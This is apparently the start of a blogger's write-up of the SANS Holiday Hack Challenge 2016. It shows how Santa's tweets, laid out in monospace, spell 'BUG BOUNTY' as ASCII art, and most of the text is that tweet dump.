SANS Holiday Hack 2016

It all starts on https://holidayhackchallenge.com/2016/ – where we’re shown Santa Claus’s business card, told the story, and asked to solve some questions/challenges.

Part 1: A Most Curious Business Card

1) What is the secret message in Santa’s tweets?
2) What is inside the ZIP file distributed by Santa’s team?

We’re told to look at Santa’s business card, and enter the game, then answer the questions:



Looking at his Twitter page we can see a lot of tweets, made up of Christmas related words but not making much sense. Looking at them all together, using a service like AllMyTweets to fetch them and then copying + pasting them in to a text editor (to get monospacing) they reveal the phrase “BUG BOUNTY” read vertically:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ Nov 14, 2016
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ Nov 14, 2016
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS Nov 14, 2016
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF Nov 14, 2016
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ Nov 14, 2016
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ Nov 14, 2016
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ Nov 14, 2016
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF Nov 14, 2016
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ Nov 14, 2016
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ Nov 14, 2016
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY Nov 14, 2016
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF Nov 14, 2016
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS Nov 14, 2016
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH Nov 14, 2016
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF Nov 14, 2016
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY Nov 14, 2016
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO Nov 14, 2016
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF Nov 14, 2016
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF Nov 14, 2016
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY Nov 14, 2016
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH Nov 14, 2016
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ Nov 14, 2016
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY Nov 14, 2016
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY Nov 14, 2016
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ Nov 14, 2016
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ Nov 14, 2016
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ Nov 14, 2016
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ Nov 14, 2016
CHRISTMASHOHOHOELFQQ...............dQ,..........<GOODWILLTOWARDSMENHOHOHOQQ Nov 14, 2016
GOODWILLTOWARDSMENQQL.............<QQm,........_HOHOHOHOHOHOCHRISTMASELFELF Nov 14, 2016
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ Nov 14, 2016
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ Nov 14, 2016
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA Nov 14, 2016
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ Nov 14, 2016
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ Nov 14, 2016
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH Nov 14, 2016
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ Nov 14, 2016
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF Nov 14, 2016
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF Nov 14, 2016
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF Nov 14, 2016
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ Nov 14, 2016
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY Nov 14, 2016
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ Nov 14, 2016
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY Nov 14, 2016
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE Nov 14, 2016
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ Nov 14, 2016
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN Nov 14, 2016
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ Nov 14, 2016
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO Nov 14, 2016
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ Nov 14, 2016
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ Nov 14, 2016
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ Nov 14, 2016
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ Nov 14, 2016
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ Nov 14, 2016
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ Nov 14, 2016
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY Nov 14, 2016
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH Nov 14, 2016
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ Nov 14, 2016
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY Nov 14, 2016
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN Nov 14, 2016
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ Nov 14, 2016
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ Nov 14, 2016
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH Nov 14, 2016
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA Nov 14, 2016
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ Nov 14, 2016
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF Nov 14, 2016
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ Nov 14, 2016
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ Nov 14, 2016
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ Nov 14, 2016
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF Nov 14, 2016
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ Nov 14, 2016
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF Nov 14, 2016
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ Nov 14, 2016
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN Nov 14, 2016
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ Nov 14, 2016
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY Nov 14, 2016
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF Nov 14, 2016
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF Nov 14, 2016
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ Nov 14, 2016
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ Nov 14, 2016
CHRISTMASSANTAELFQ[........<HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF Nov 14, 2016
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ Nov 14, 2016
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ Nov 14, 2016
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ Nov 14, 2016
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ Nov 14, 2016
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH Nov 14, 2016
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ Nov 14, 2016
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY Nov 14, 2016
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY Nov 14, 2016
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN Nov 14, 2016
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ Nov 14, 2016
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ Nov 14, 2016
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF Nov 14, 2016
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF Nov 14, 2016
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ Nov 14, 2016
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ Nov 14, 2016
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE Nov 14, 2016
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....<SANTAHOHOHONORTHPOLEELFSANTA Nov 14, 2016
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ Nov 14, 2016
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ Nov 14, 2016
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ Nov 14, 2016
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO Nov 14, 2016
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ Nov 14, 2016
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ Nov 14, 2016
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ Nov 14, 2016
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ Nov 14, 2016
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ Nov 14, 2016
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ Nov 14, 2016
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF Nov 14, 2016
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ Nov 14, 2016
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF Nov 14, 2016
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ Nov 14, 2016
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY Nov 14, 2016
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO Nov 14, 2016
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE Nov 14, 2016
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA Nov 14, 2016
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ Nov 14, 2016
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO Nov 14, 2016
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ Nov 14, 2016
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ Nov 14, 2016
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ Nov 14, 2016
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ Nov 14, 2016
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF Nov 14, 2016
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF Nov 14, 2016
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA Nov 14, 2016
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS Nov 14, 2016
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ Nov 14, 2016
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY Nov 14, 2016
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ Nov 14, 2016
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ Nov 14, 2016
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF Nov 14, 2016
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE Nov 14, 2016
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF Nov 14, 2016
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ Nov 14, 2016
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY Nov 14, 2016
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF Nov 14, 2016
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY Nov 14, 2016
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN Nov 14, 2016
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY Nov 14, 2016
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ Nov 14, 2016
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ Nov 14, 2016
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ Nov 14, 2016
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ Nov 14, 2016
CHRISTMASHOHOHOJOYQm...............dQ,..........<GOODWILLTOWARDSMENQWSANTAQ Nov 14, 2016
SANTACHRISTMASSANTAQL.............<QQm,........_JOYELFGOODWILLTOWARDSMENELF Nov 14, 2016
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ Nov 14, 2016
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF Nov 14, 2016
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ Nov 14, 2016
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ Nov 14, 2016
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY Nov 14, 2016
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF Nov 14, 2016
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY Nov 14, 2016
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ Nov 14, 2016
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ Nov 14, 2016
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA Nov 14, 2016
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ Nov 14, 2016
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ Nov 14, 2016
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ Nov 14, 2016
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS Nov 14, 2016
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ Nov 14, 2016
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ Nov 14, 2016
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA Nov 14, 2016
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ Nov 14, 2016
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH Nov 14, 2016
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ Nov 14, 2016
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO Nov 14, 2016
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF Nov 14, 2016
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY Nov 14, 2016
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF Nov 14, 2016
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO Nov 14, 2016
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO Nov 14, 2016
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA Nov 14, 2016
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......<HOHOHOSANTANORTHPOLEQQWQ Nov 14, 2016
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO Nov 14, 2016
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO Nov 14, 2016
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ Nov 14, 2016
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO Nov 14, 2016
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ Nov 14, 2016
SANTAPEACEONEARTHJOY/...........................<NORTHPOLECHRISTMASHOHOHOQQ Nov 14, 2016
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF Nov 14, 2016
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF Nov 14, 2016
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ Nov 14, 2016
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF Nov 14, 2016
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO Nov 14, 2016
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ Nov 14, 2016
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ Nov 14, 2016
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ Nov 14, 2016
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ Nov 14, 2016
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ Nov 14, 2016
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY Nov 14, 2016
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ Nov 14, 2016
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ Nov 14, 2016
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ Nov 14, 2016
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO Nov 14, 2016
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ Nov 14, 2016
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ Nov 14, 2016
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE Nov 14, 2016
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ Nov 14, 2016
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ Nov 14, 2016
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ Nov 14, 2016
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ Nov 14, 2016
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ Nov 14, 2016
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA Nov 14, 2016
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ Nov 14, 2016
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ Nov 14, 2016
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ Nov 14, 2016
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ Nov 14, 2016
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF Nov 14, 2016
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO Nov 14, 2016
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF Nov 14, 2016
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ Nov 14, 2016
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ Nov 14, 2016
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ Nov 14, 2016
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF Nov 14, 2016
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ Nov 14, 2016
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ Nov 14, 2016
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ Nov 14, 2016
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE Nov 14, 2016
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ Nov 14, 2016
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH Nov 14, 2016
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ Nov 14, 2016
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ Nov 14, 2016
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF Nov 14, 2016
